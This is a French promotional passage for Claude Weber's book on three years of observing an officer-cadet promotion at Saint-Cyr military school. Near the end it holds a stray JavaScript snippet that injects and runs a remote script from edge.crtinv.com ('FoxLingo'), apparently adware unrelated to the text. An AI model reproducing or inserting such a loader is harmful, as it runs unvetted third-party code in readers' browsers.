Claude Weber nous fait partager ses trois années d’observations au sein de cette prestigieuse institution qu’est l’École Spéciale Militaire de Saint-Cyr, créée par Napoléon il y a plus de deux cents ans.
Qui sont les Saints-Cyriens ? Comment se déroule la formation militaire, académique et humaine des futurs officiers de l’armée de Terre ? Comment, à partir d’un ensemble d’individus, naît une promotion ? Que revêtent les traditions saint-cyriennes et comment se transmettent-t-elles de génération en génération d’élèves ?
Pour la première fois un chercheur a suivi, sans restriction, une promotion de l’École Spéciale Militaire de Saint-Cyr. Des activités d’instructions au fond des landes bretonnes jusqu’aux forêts inhospitalière de Guyane, Claude Weber nous fait partager ses trois années d’observations et nous fait pénétrer au sein de cette prestigieuse institution créée par Napoléon il y a plus de deux cents ans.
> À genou les hommes, debout les officiers, Editions PUR (Presses Universitaire de Rennes)
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Droits : Armée de Terre 2012